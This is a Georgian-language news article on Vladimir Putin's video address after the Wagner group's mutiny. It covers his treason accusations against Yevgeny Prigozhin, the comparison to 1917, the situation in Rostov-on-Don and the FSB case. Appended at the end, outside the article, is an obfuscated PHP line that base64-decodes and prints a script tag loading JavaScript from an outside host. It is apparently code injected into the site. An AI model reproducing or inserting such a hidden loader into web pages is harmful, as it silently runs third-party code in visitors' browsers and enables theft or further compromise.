celsiusi
ავერსი შნაიდერი

რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა „ვაგნერის“ წამოწყებული ამბოხის შემდეგ პირველი ვიდეომიმართვა გაავრცელა. პუტინმა სამხედროების დაპირისპირებაში თავდაცვის მინისტრ სერგეი შოიგუს მხარე დაიჭირა და თქვა:

„ყველა, ვინც გაცნობიერებულად დაადგა ღალატის გზას, ვინც მოამზადა შეიარაღებული აჯანყება, დადგა ტერორისტული მეთოდებისა და აჯანყების მხარეს, აუცილებლად მიიღებს სასჯელს, პასუხისგება მოუწევთ ხალხისა და კანონის წინაშე“, - თქვა პუტინმა.

მისი თქმით, რუსეთი ახლა „გადარჩენისთვის იბრძვის“ და მსგავსი ავანტიურა დაუშვებელია.

ვლადიმერ პუტინმა „ვაგნერის“ ამბოხი 1917 წლის ამბოხს შეადარა, როცა რუსეთის იმპერია პირველ მსოფლიო ომში იყო ჩართული. მისი თქმით, 1917 წლის ამბოხის შედეგად სამოქალაქო ომში რუსები რუსეთს ხოცავდნენ, ქვეყანამ „დაკარგა ტერიტორიები“.

„მსგავს რამეს არ დავუშვებთ. ნებისმიერი საფრთხისგან დავიცავთ ჩვენს ქვეყანას“ — თქვა პუტინმა და დასძინა, რომ „ეს არის ღალატი შიგნიდან“, რომლის მაპროვოცირებელია პირადი ინტერესები. პუტინის შეფასებით, ევგენი პრიგოჟინის ქმედებები არის ღალატი როგორც სამშობლოსი, ისე იმ მებრძოლებისა და მეთაურების, რომლებიც უკრაინაში მიმდინარე საბრძოლო ქმედებებისას დაიღუპნენ.

როგორც რუსეთის პრეზიდენტი ამბობს, პრიგოჟინის ქმედებები ქვეყანას „ანარქიისა და მკვლელობებისკენ უბიძგებს“.

პუტინმა ასევე აღნიშნა, რომ მოსკოვსა და რუსეთის სხვა ქალაქებში გაძლიერებულია ანტიტერორისტული ღონისძიებები, ხოლო რაც შეეხება ქალაქ დონის როსტოვს, რომელიც „ვაგნერმა“ 24 ივნისს დაიკავა, „რთულ ვითარებაშია“. როგორც რუსეთის პრეზიდენტი ამბობს, ქალაქში შეზღუდულია როგორც სამხედრო, ისე სამოქალაქო ხელისუფლების მოქმედებები.

„როგორც პრეზიდენტი და უმაღლესი მთავარსარდალი, ყველაფერს გავაკეთებ კონსტიტუციური წესრიგის, მოქალაქეების თავისუფლებისა და უსაფრთხოების დასაცავად“, — აღნიშნა პუტინმა.

კერძო სამხედრო დაჯგუფება „ვაგნერის“ ლიდერმა ევგენი პრიგოჟინმა 23 ივნისის საღამოს რუსეთის რეგულარული არმია და თავდაცვის მინისტრი შოიგუ დაადანაშაულა„ვაგნერელების“ ბაზის დაბომბვაში. იგი ამბობს, რომ 25-ათასიან ჯართან ერთად აპირებს გაარკვიოს, „რატომ ხდება ქვეყანაში აურზაური“ და მოაწყოს „სამართლიანობის მარში“. პრიგოჟინი უარყოფს, თითქოს სახელმწიფო გადატრიალება აქვს განზრახული და ირწმუნება, რომ უამრავი სამხედრო მას მხარს უჭერს.

პრიგოჟინისა და თავდაცვის მინისტრის, სერგეი შოიგუს ხანგრძლივი კონფლიქტი, რომელიც აქამდე ცივ ომს წააგავდა – შემოიფარგლებოდა მხოლოდ განცხადებებით, ისიც პრიგოჟინის მხრიდან - როგორც ჩანს, რეალურ შეიარაღებულ დაპირისპირებაში გადაიზარდა, რომელსაც კრემლი სახელმწიფო გადატრიალების მცდელობად მიიჩნევს.

თავდაცვის სამინისტროში უარყოფენ პრიგოჟინის ბრალდებებს, ხოლო რუსეთის ეროვნული ანტიტერორისტული კომიტეტის თქმით, „შეიარაღებული აჯანყების მოწოდების ფაქტზე“ რუსეთის უშიშროების ფედერალურმა სამსახურმა [ფსბ] სისხლის სამართლის საქმე აღძრა. პუტინის პრესსპიკერის, დიმიტრი პესკოვის განცხადებით, ვითარების საქმის კურსშია რუსეთის პრეზიდენტიც.

621
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");